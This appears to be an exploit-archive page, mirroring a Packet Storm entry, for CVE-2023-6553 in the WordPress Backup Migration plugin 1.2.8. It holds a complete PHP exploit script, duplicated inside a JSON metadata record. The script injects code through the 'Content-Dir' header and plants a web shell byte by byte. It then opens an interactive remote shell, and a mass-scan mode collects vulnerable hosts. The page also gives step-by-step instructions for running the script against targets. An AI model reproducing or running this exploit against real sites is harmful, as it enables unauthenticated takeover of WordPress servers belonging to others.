📄 WordPress Backup Migration 1.2.8 Remote Code Execution_PACKETSTORM:211997

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

WordPress Backup Migration plugin version 1.2.8 proof of concept code injection exploit for an older vulnerability from 2023...

Visit Original Source

Basic Information

ID PACKETSTORM:211997

Published Nov 25, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : WordPress Backup Migration 1.2.8 PHP Code Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/backup-backup/ |
=============================================================================================================================================

POC :

1. Vulnerability Overview
-------------------------
A critical Remote Code Execution vulnerability exists in the WordPress (https://packetstorm.news/files/id/207962/)
plugin "Backup Migration" (backup-backup), allowing arbitrary PHP code
execution via an unsafe header parameter inside:

/wp-content/plugins/backup-backup/includes/backup-heart.php

The plugin processes attacker-controlled content from the HTTP header
"Content-Dir" and writes it directly into PHP files inside the plugin
directory. This allows an attacker to:

• Write arbitrary PHP files
• Overwrite internal plugin files
• Deploy a persistent web shell
• Achieve full remote command execution

No authentication is required.

====================================================================

2. PHP Exploit Description
--------------------------
This exploit is a full PHP CLI conversion of the original Python version.
It performs:

• Vulnerability verification
• Payload file creation
• Arbitrary file write via hex-encoded characters
• Deployment of an interactive remote shell
• Cleanup of the temporary shell

The exploit works even when many PHP execution functions are disabled.

====================================================================

3. Usage Instructions (CLI Mode)
--------------------------------

Save the file as:

exploit.php

Then run from terminal:

php exploit.php -u https://target.com

Options:
-u <url> Test and exploit a single target
-c Check only (no shell deployment)
-f <file> Scan a list of targets (one per line)
-t <n> Number of concurrent workers (default 5)
-o <file> Save vulnerable hosts to output file
--help Show help

Examples:

• Check vulnerability only:
php exploit.php -u https://site.com -c

• Exploit and open interactive shell:
php exploit.php -u https://site.com

• Scan targets list:
php exploit.php -f targets.txt -o vulnerable.txt

====================================================================

4. Saving The PHP Code (Important)
----------------------------------
1. Copy the PHP exploit code into a file named:

exploit.php

2. Make sure PHP CLI is installed:
php -v

3. Give execution permission (Linux only):
chmod +x exploit.php

4. Run the exploit:
php exploit.php -u https://victim.com

====================================================================

5. How The Exploit Works
------------------------
Step 1: Send payload using "Content-Dir" header
Step 2: Plugin writes attacker-controlled PHP to temporary file
Step 3: Exploit writes final shell using hex-encoded bytes
Step 4: Web shell copied into plugin directory
Step 5: Interactive command execution via HTTP requests

The exploit shell uses GET parameter "?0=" to wrap command output with:

[S] output [E]

This allows clean extraction and parsing.

====================================================================

6. Full PHP Exploit Code
------------------------
<?php
/**
* CVE-2023-6553 Exploit – PHP CLI Version
* by Indoushka
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

class CVE_2023_6553 {
public $base_url;
public $temp_file_name;
public $random_file_name;

public function __construct($base_url) {
$this->base_url = rtrim($base_url, '/');
$this->temp_file_name = chr(rand(65,90)); // single random char
$this->random_file_name = substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"),0,3) . ".php";
}

public function send_payload($payload) {
$url = $this->base_url . "/wp-content/plugins/backup-backup/includes/backup-heart.php";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => ["Content-Dir: $payload"],
CURLOPT_TIMEOUT => 10,
CURLOPT_POST => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
$err = curl_errno($ch);
curl_close($ch);
return ($err===0);
}

public function check_vulnerability() {
$random_char = chr(rand(65,90));
$payload = "<?php fwrite(fopen('{$this->temp_file_name}','w'),'{$random_char}');?>";
$this->send_payload($payload);

$url = $this->base_url . "/wp-content/plugins/backup-backup/includes/{$this->temp_file_name}";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
curl_close($ch);

if(trim($res) === $random_char) {
echo "[+] {$this->base_url} is vulnerable to CVE-2023-6553\n";
return true;
}
return false;
}

public function write_string_to_file($string_to_write) {
$init = "<?php fwrite(fopen('{$this->temp_file_name}','w'),'');?>";
$this->send_payload($init);

$len = strlen($string_to_write);
for($i=0;$i<$len;$i++){
$hex = bin2hex($string_to_write[$i]);
$cmd = "<?php fwrite(fopen('{$this->temp_file_name}','a'),\"\\x{$hex}\");?>";
if(!$this->send_payload($cmd)){
echo "Failed at character: {$string_to_write[$i]}\n";
return false;
}
}

$copy = "<?php copy('{$this->temp_file_name}','{$this->random_file_name}');?>";
$this->send_payload($copy);
$delete = "<?php unlink('{$this->temp_file_name}');?>";
$this->send_payload($delete);
return true;
}

public function retrieve_command_output($command) {
$url = $this->base_url . "/wp-content/plugins/backup-backup/includes/{$this->random_file_name}?0=" . urlencode($command);
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
curl_close($ch);
if(preg_match("/\\[S\\](.*?)\\[E\\]/s",$res,$m)) return $m[1];
return "No output or functions disabled.";
}

public function interactive_shell() {
echo "[+] Entering interactive shell (type 'exit' to quit)\n";
while(true){
echo "# ";
$cmd = trim(fgets(STDIN));
if($cmd === "exit") break;
echo $this->retrieve_command_output($cmd) . "\n";
}
}
}

// ---------------- CLI Handler -----------------
$options = getopt("u:f:t:o:c");
$url = $options['u'] ?? null;
$file = $options['f'] ?? null;
$threads = intval($options['t'] ?? 5);
$output = $options['o'] ?? null;
$check_only = isset($options['c']);

if($url){
$exploit = new CVE_2023_6553($url);
if($exploit->check_vulnerability()){
if(!$check_only){
$shell_code = '<?php echo "[S]";echo `$_GET[0]`;echo "[E]";?>';
if($exploit->write_string_to_file($shell_code)){
echo "[+] Shell deployed successfully!\n";
$exploit->interactive_shell();
echo "[!] Deleting shell...\n";
$exploit->send_payload("<?php unlink('{$exploit->random_file_name}');?>");
}
}
} else {
echo "[!] {$url} is not vulnerable.\n";
}
} elseif($file){
$urls = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach($urls as $u){
$exploit = new CVE_2023_6553($u);
$exploit->check_vulnerability();
if($output && $exploit->check_vulnerability()){
file_put_contents($output,$u.PHP_EOL,FILE_APPEND);
}
}
} else {
echo "Usage: php exploit.php -u <url> [-c] | -f <file> [-t threads] [-o output]\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-25T19:09:16",
    "description": "WordPress Backup Migration plugin version 1.2.8 proof of concept code injection exploit for an older vulnerability from 2023...",
    "published": "2025-11-25T00:00:00",
    "modified": "2025-11-25T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress Backup Migration 1.2.8 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:211997",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2023-6553"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : WordPress Backup Migration 1.2.8 PHP Code Injection                                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://wordpress.org/plugins/backup-backup/                                                                                |\n    =============================================================================================================================================\n    \n    POC : \n    \n    1. Vulnerability Overview\n    -------------------------\n    A critical Remote Code Execution vulnerability exists in the WordPress (https://packetstorm.news/files/id/207962/)\n    plugin \"Backup Migration\" (backup-backup), allowing arbitrary PHP code\n    execution via an unsafe header parameter inside:\n    \n        /wp-content/plugins/backup-backup/includes/backup-heart.php\n    \n    The plugin processes attacker-controlled content from the HTTP header\n    \"Content-Dir\" and writes it directly into PHP files inside the plugin\n    directory. This allows an attacker to:\n    \n      \u2022 Write arbitrary PHP files  \n      \u2022 Overwrite internal plugin files  \n      \u2022 Deploy a persistent web shell  \n      \u2022 Achieve full remote command execution  \n    \n    No authentication is required.\n    \n    ====================================================================\n    \n    2. PHP Exploit Description\n    --------------------------\n    This exploit is a full PHP CLI conversion of the original Python version.\n    It performs:\n    \n      \u2022 Vulnerability verification  \n      \u2022 Payload file creation  \n      \u2022 Arbitrary file write via hex-encoded characters  \n      \u2022 Deployment of an interactive remote shell  \n      \u2022 Cleanup of the temporary shell  \n    \n    The exploit works even when many PHP execution functions are disabled.\n    \n    ====================================================================\n    \n    3. Usage Instructions (CLI Mode)\n    --------------------------------\n    \n    Save the file as:\n    \n        exploit.php\n    \n    Then run from terminal:\n    \n        php exploit.php -u https://target.com\n    \n    Options:\n        -u <url>     Test and exploit a single target\n        -c           Check only (no shell deployment)\n        -f <file>    Scan a list of targets (one per line)\n        -t <n>       Number of concurrent workers (default 5)\n        -o <file>    Save vulnerable hosts to output file\n        --help       Show help\n    \n    Examples:\n    \n      \u2022 Check vulnerability only:\n            php exploit.php -u https://site.com -c\n    \n      \u2022 Exploit and open interactive shell:\n            php exploit.php -u https://site.com\n    \n      \u2022 Scan targets list:\n            php exploit.php -f targets.txt -o vulnerable.txt\n    \n    ====================================================================\n    \n    4. Saving The PHP Code (Important)\n    ----------------------------------\n    1. Copy the PHP exploit code into a file named:\n    \n           exploit.php\n    \n    2. Make sure PHP CLI is installed:\n           php -v\n    \n    3. Give execution permission (Linux only):\n           chmod +x exploit.php\n    \n    4. Run the exploit:\n           php exploit.php -u https://victim.com\n    \n    ====================================================================\n    \n    5. How The Exploit Works\n    ------------------------\n    Step 1: Send payload using \"Content-Dir\" header  \n    Step 2: Plugin writes attacker-controlled PHP to temporary file  \n    Step 3: Exploit writes final shell using hex-encoded bytes  \n    Step 4: Web shell copied into plugin directory  \n    Step 5: Interactive command execution via HTTP requests  \n    \n    The exploit shell uses GET parameter \"?0=\" to wrap command output with:\n    \n        [S] output [E]\n    \n    This allows clean extraction and parsing.\n    \n    ====================================================================\n    \n    6. Full PHP Exploit Code\n    ------------------------\n    <?php\n    /**\n     * CVE-2023-6553 Exploit \u2013 PHP CLI Version\n     * by Indoushka\n     */\n    \n    error_reporting(E_ALL);\n    ini_set('display_errors', 1);\n    \n    class CVE_2023_6553 {\n        public $base_url;\n        public $temp_file_name;\n        public $random_file_name;\n    \n        public function __construct($base_url) {\n            $this->base_url = rtrim($base_url, '/');\n            $this->temp_file_name = chr(rand(65,90)); // single random char\n            $this->random_file_name = substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"),0,3) . \".php\";\n        }\n    \n        public function send_payload($payload) {\n            $url = $this->base_url . \"/wp-content/plugins/backup-backup/includes/backup-heart.php\";\n            $ch = curl_init($url);\n            curl_setopt_array($ch, [\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_HTTPHEADER => [\"Content-Dir: $payload\"],\n                CURLOPT_TIMEOUT => 10,\n                CURLOPT_POST => true,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false\n            ]);\n            $res = curl_exec($ch);\n            $err = curl_errno($ch);\n            curl_close($ch);\n            return ($err===0);\n        }\n    \n        public function check_vulnerability() {\n            $random_char = chr(rand(65,90));\n            $payload = \"<?php fwrite(fopen('{$this->temp_file_name}','w'),'{$random_char}');?>\";\n            $this->send_payload($payload);\n    \n            $url = $this->base_url . \"/wp-content/plugins/backup-backup/includes/{$this->temp_file_name}\";\n            $ch = curl_init($url);\n            curl_setopt_array($ch, [\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_TIMEOUT => 10,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false\n            ]);\n            $res = curl_exec($ch);\n            curl_close($ch);\n    \n            if(trim($res) === $random_char) {\n                echo \"[+] {$this->base_url} is vulnerable to CVE-2023-6553\\n\";\n                return true;\n            }\n            return false;\n        }\n    \n        public function write_string_to_file($string_to_write) {\n            $init = \"<?php fwrite(fopen('{$this->temp_file_name}','w'),'');?>\";\n            $this->send_payload($init);\n    \n            $len = strlen($string_to_write);\n            for($i=0;$i<$len;$i++){\n                $hex = bin2hex($string_to_write[$i]);\n                $cmd = \"<?php fwrite(fopen('{$this->temp_file_name}','a'),\\\"\\\\x{$hex}\\\");?>\";\n                if(!$this->send_payload($cmd)){\n                    echo \"Failed at character: {$string_to_write[$i]}\\n\";\n                    return false;\n                }\n            }\n    \n            $copy = \"<?php copy('{$this->temp_file_name}','{$this->random_file_name}');?>\";\n            $this->send_payload($copy);\n            $delete = \"<?php unlink('{$this->temp_file_name}');?>\";\n            $this->send_payload($delete);\n            return true;\n        }\n    \n        public function retrieve_command_output($command) {\n            $url = $this->base_url . \"/wp-content/plugins/backup-backup/includes/{$this->random_file_name}?0=\" . urlencode($command);\n            $ch = curl_init($url);\n            curl_setopt_array($ch, [\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_TIMEOUT => 10,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false\n            ]);\n            $res = curl_exec($ch);\n            curl_close($ch);\n            if(preg_match(\"/\\\\[S\\\\](.*?)\\\\[E\\\\]/s\",$res,$m)) return $m[1];\n            return \"No output or functions disabled.\";\n        }\n    \n        public function interactive_shell() {\n            echo \"[+] Entering interactive shell (type 'exit' to quit)\\n\";\n            while(true){\n                echo \"# \";\n                $cmd = trim(fgets(STDIN));\n                if($cmd === \"exit\") break;\n                echo $this->retrieve_command_output($cmd) . \"\\n\";\n            }\n        }\n    }\n    \n    // ---------------- CLI Handler -----------------\n    $options = getopt(\"u:f:t:o:c\");\n    $url = $options['u'] ?? null;\n    $file = $options['f'] ?? null;\n    $threads = intval($options['t'] ?? 5);\n    $output = $options['o'] ?? null;\n    $check_only = isset($options['c']);\n    \n    if($url){\n        $exploit = new CVE_2023_6553($url);\n        if($exploit->check_vulnerability()){\n            if(!$check_only){\n                $shell_code = '<?php echo \"[S]\";echo `$_GET[0]`;echo \"[E]\";?>';\n                if($exploit->write_string_to_file($shell_code)){\n                    echo \"[+] Shell deployed successfully!\\n\";\n                    $exploit->interactive_shell();\n                    echo \"[!] Deleting shell...\\n\";\n                    $exploit->send_payload(\"<?php unlink('{$exploit->random_file_name}');?>\");\n                }\n            }\n        } else {\n            echo \"[!] {$url} is not vulnerable.\\n\";\n        }\n    } elseif($file){\n        $urls = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\n        foreach($urls as $u){\n            $exploit = new CVE_2023_6553($u);\n            $exploit->check_vulnerability();\n            if($output && $exploit->check_vulnerability()){\n                file_put_contents($output,$u.PHP_EOL,FILE_APPEND);\n            }\n        }\n    } else {\n        echo \"Usage: php exploit.php -u <url> [-c] | -f <file> [-t threads] [-o output]\\n\";\n    }\n    ?>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/211997",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/211997/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply